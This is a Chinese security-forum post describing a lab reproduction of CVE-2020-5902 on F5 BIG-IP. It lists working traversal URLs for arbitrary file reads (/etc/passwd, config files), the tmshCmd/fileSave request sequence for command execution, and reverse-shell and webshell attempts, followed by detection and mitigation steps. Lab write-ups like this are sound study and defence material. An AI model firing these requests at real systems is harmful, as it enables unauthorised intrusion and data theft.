用户
搜索
  • TA的每日心情
    奋斗
    3 天前
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋-脚本小子

    Rank: 2

    4

    主题

    8

    帖子

    121

    魔法币
    收听
    2
    粉丝
    0
    注册时间
    2018-7-4
    发表于 2020-7-20 10:36:48 103553
    最近报上了公司专家的大腿,上周安排了复现CVE-2020-5902的作业,复现过程中遇到一些坑,在此分享给大家。

    漏洞描述​ 近日,F5官方发布公告,修复了流量管理用户界面(TMUI)中存在的一个远程代码执行漏洞(CVE-2020-5902)。此漏洞允许未经身份验证的攻击者或经过身份验证的用户通过BIG-IP管理端口和/或自身IP对TMUI进行网络访问,以执行任意系统命令、创建或删除文件、禁用服务和/或执行任意Java代码。该漏洞可能对整个系统造成危害。目前监测到网络上已经有PoC,并且已有利用该漏洞的攻击行为出现,建议用户尽快升级进行防护。
    ​ F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台
    受影响的版本
    F5 BIG-IP 15.x 已知易受攻击版本 15.1.0、15.0.0
    F5 BIG-IP 14.x 已知易受攻击版本 14.1.0-14.1.2
    F5 BIG-IP 13.x 已知易受攻击版本 13.1.0-13.1.3
    F5 BIG-IP 12.x 已知易受攻击版本 12.1.0-12.1.5
    F5 BIG-IP 11.x 已知易受攻击版本 11.6.1-11.6.5


    1、搭建漏洞环境
    官网下载存在该漏洞的虚拟机镜像
    图片 1.png

    导入vmware打开
    图片 2.png

    收不到激活邮件,使用poc验证返回404.网上也有表哥遇到这个问题。改用14.1.2版本
    2、任意文件读取
    https://192.168.31.85/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

    还可以读取配置文件/config/bigip.license/config/bigip.conf等
    3、任意文件写入
    /tmp/0715写入 venus

    读取/tmp/0715的内容
    图片 3.png
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps4.jpg
    4、命令执行4.1手工利用
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps5.jpg
    漏洞利用主要分为四步
    tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
    //先创建执行命令的模式,将list 设置为 bash
    fileSave.jsp?fileName=/tmp/cmd&content=id //向创建的文件中写入要执行的命令
    tmshCmd.jsp?command=list+/tmp/cmd //使用list执行文件中的命令
    tmshCmd.jsp?command=delete+cli+alias+private+list  //清空list设置
    图片 4.png
    手工执行RCE payload,没有生效,暂时不知道问题出在哪。
    4.2工具利用
    使用大佬的工具进行利用,将脚本中的ip修改成靶机的
    图片 5.png
    图片 6.png
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps6.jpgfile:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps7.jpg
    仔细观察,返现命令执行回显不对。
    4.3问题排查
    开始排查,猜测跟web系统没有登录成功且修改初始密码有关。网上有表哥说web账号是root,试了,不对。第二天睡醒,重新搭建虚拟机环境,发现web的初始密码与系统更改后的密码一样,账号是admin         
    图片 1_3.png
    不严谨的技术文章误人子弟啊
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps8.jpg
    登录web系统,更改初始密码后,命令执行回显正常
    图片 2_2.png
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps9.jpg
    手工RCE payload也生效了,看来就是因为web系统没改初始密码,系统功能不全导致
    图片 3_2.png
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps10.jpg
    5、反弹shell获取交互式命令界面
    使用Jas502n大佬的工具弹
    尝试写入jsp一句话
    图片 4_2.png
    将的kali自带的jsp webshell写入,失败,超出每次可写入最大长度
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps12.jpg
    6、漏洞检测
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps13.jpg
    可以使用nmap检测脚本检测该漏洞,缩短发现时间
    图片 5_2.png
    7、漏洞修复
    1) 使用以下命令登录对应系统
    tmsh
    2) 编辑 httpd 组件的配置文件
    edit /sys httpd all-properties
    3) 文件内容如下
    include ' <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> '
    4) 按照如下操作保存文件
    按下 ESC 并依次输入 :wq
    5) 执行命令刷新配置文件
    save /sys config
    6) 重启 httpd 服务
    restart sys service httpd
    并禁止外部IPTMUI 页面的访问
    图片 6_2.png
    图片 7.png
    测试,发现漏洞已经修复
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps15.jpg
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps16.jpg
    7.1注意
    修复时发现第3点,直接输成一行,提示<LocationMatch>标签未闭合,必须按照下图所示才可以
    图片 8.png
    file:///C:\Users\ghoul\AppData\Local\Temp\ksohtml2136\wps17.jpg

    8、参考文章




    评分

    参与人数 1魔法币 +1 收起 理由
    MCtech + 1 感谢你的分享,i春秋论坛有你更精彩!.

    查看全部评分

    本帖被以下淘专辑推荐:

    发表于 2020-7-21 16:10:53
    里面好多路径……
    使用道具 举报 回复
    nfscars 发表于 2020-7-21 16:10
    里面好多路径……

    第一次发帖,业务不熟练,以后会避免的,希望本文对表哥有帮助
    使用道具 举报 回复
    老铁来了 顶一下
    使用道具 举报 回复
    我之前老是卡在收邮件的步骤,结果发现是版本并不对。。后来也是用了14的版本才成功
    使用道具 举报 回复
    发表于 2020-7-22 16:35:16

    使用道具 举报 回复
    发表于 2020-7-22 16:40:06
    优秀啊,经理
    使用道具 举报 回复
    发表于 2020-7-22 17:46:10
    好猛啊
    使用道具 举报 回复
    发表于 2020-7-22 18:46:13
    新鲜热乎的知识,学习了,大佬tql
    使用道具 举报 回复
    发表于 2020-7-25 13:42:13
    优秀啊,tql
    使用道具 举报 回复
    优秀优秀!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册